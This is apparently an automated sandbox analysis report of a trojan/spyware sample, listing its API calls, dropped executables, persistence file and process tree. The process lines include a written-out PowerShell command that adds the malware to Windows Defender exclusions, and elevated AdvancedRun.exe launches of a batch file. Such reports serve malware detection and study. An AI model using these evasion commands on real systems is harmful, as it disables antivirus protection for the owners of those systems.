Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A480 ZwInitializeNlsFiles, 29_2_6A95A480
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E9CB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 29_2_6A950CA1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E4CAB ZwTraceControl, 29_2_6A9E4CAB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8CD6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912CDB RtlFreeHeap,ZwClose,ZwSetEvent, 29_2_6A912CDB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A4C0 ZwIsUILanguageComitted, 29_2_6A95A4C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D14FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D14FB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 29_2_6A9C64FB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 29_2_6A91F4E3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1CE4 ZwQueryInformationProcess, 29_2_6A9A1CE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950413 ZwUnmapViewOfSection, 29_2_6A950413
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8C14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1411 ZwTraceEvent, 29_2_6A9D1411
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93FC39 ZwAssociateWaitCompletionPacket, 29_2_6A93FC39
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose, 29_2_6A91E420
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A420 ZwGetNlsSectionPtr, 29_2_6A95A420
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 29_2_6A915450
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1C49 ZwQueryInformationProcess, 29_2_6A9A1C49
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959C40 ZwAllocateVirtualMemoryEx, 29_2_6A959C40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959C70 ZwAlpcConnectPort, 29_2_6A959C70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A955C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 29_2_6A955C70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8C75
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1C76 ZwQueryInformationProcess, 29_2_6A9A1C76
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 29_2_6A9C3C60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6A93746D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913591 ZwSetInformationFile, 29_2_6A913591
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 29_2_6A92DD80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DB581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1582 ZwTraceEvent, 29_2_6A9D1582
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595B0 ZwSetInformationThread, 29_2_6A9595B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959DB0 ZwAlpcSetInformation, 29_2_6A959DB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9165A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 29_2_6A9165A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959DA0 ZwAlpcSendWaitReceivePort, 29_2_6A959DA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9145D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 29_2_6A9145D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595D0 ZwClose, 29_2_6A9595D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9CFDD3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 29_2_6A914DC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595C0 ZwSetEvent, 29_2_6A9595C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93EDC4 ZwCancelWaitCompletionPacket, 29_2_6A93EDC4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9195F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 29_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595F0 ZwQueryInformationFile, 29_2_6A9595F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 29_2_6A9CBDFA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959DE0 ZwAssociateWaitCompletionPacket, 29_2_6A959DE0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AD10 ZwSetCachedSigningLevel, 29_2_6A95AD10
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1D0B ZwSetInformationProcess, 29_2_6A9A1D0B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8D34
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 29_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959520 ZwWaitForSingleObject, 29_2_6A959520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFD22 ZwQueryInformationProcess,RtlUniform, 29_2_6A9CFD22
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 29_2_6A9E1D55
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1D43 ZwQueryInformationThread, 29_2_6A9A1D43
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A940548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 29_2_6A940548
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959D70 ZwAlpcQueryInformation, 29_2_6A959D70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 29_2_6A9A1570
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1D6A ZwWaitForMultipleObjects, 29_2_6A9A1D6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D6D61 ZwAllocateVirtualMemoryEx, 29_2_6A9D6D61
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401915 Sleep,NtTerminateProcess, 33_2_00401915
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402040 NtQuerySystemInformation, 33_2_00402040
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402242 NtQuerySystemInformation, 33_2_00402242
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402313 NtOpenKey, 33_2_00402313
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401921 Sleep,NtTerminateProcess, 33_2_00401921
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401931 Sleep,NtTerminateProcess, 33_2_00401931
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402535 NtEnumerateKey, 33_2_00402535
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401938 Sleep,NtTerminateProcess, 33_2_00401938
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401FD8 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation, 33_2_00401FD8
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401FFE NtQuerySystemInformation,LocalAlloc, 33_2_00401FFE
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402190 NtQuerySystemInformation, 33_2_00402190
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401493 NtAllocateVirtualMemory, 33_2_00401493
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_0040199B Sleep,NtTerminateProcess, 33_2_0040199B
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_004021B5 NtQuerySystemInformation, 33_2_004021B5
Source: 32BC.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 7428.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 192F.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6DDE.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 8E8B.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5D4.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 86B8.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 75B0.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 89D7.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sfiueca.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SkB6zJ6H3N.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\cviueca Jump to behavior
Source: 1105.tmp.29.dr Binary string: \Device\IPT
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@40/37@64/12
Source: C:\Users\user\AppData\Local\Temp\5D4.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 32_2_00401306
Source: SkB6zJ6H3N.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 32_2_0040A33B
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe'
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: unknown Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5D4.exe C:\Users\user~1\AppData\Local\Temp\5D4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EDD.exe C:\Users\user~1\AppData\Local\Temp\EDD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\192F.exe C:\Users\user~1\AppData\Local\Temp\192F.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\319A.exe C:\Users\user~1\AppData\Local\Temp\319A.exe
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\69B5.exe C:\Users\user~1\AppData\Local\Temp\69B5.exe
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /SpecialRun 4101d8 4288
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\32BC.exe C:\Users\user~1\AppData\Local\Temp\32BC.exe
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5D4.exe C:\Users\user~1\AppData\Local\Temp\5D4.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EDD.exe C:\Users\user~1\AppData\Local\Temp\EDD.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\192F.exe C:\Users\user~1\AppData\Local\Temp\192F.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\319A.exe C:\Users\user~1\AppData\Local\Temp\319A.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\69B5.exe C:\Users\user~1\AppData\Local\Temp\69B5.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /SpecialRun 4101d8 4288
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 32_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 35_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 35_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user~1\AppData\Local\Temp\97A5.tmp Jump to behavior
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: sqlite3.dll.36.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.36.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 32_2_004095FD
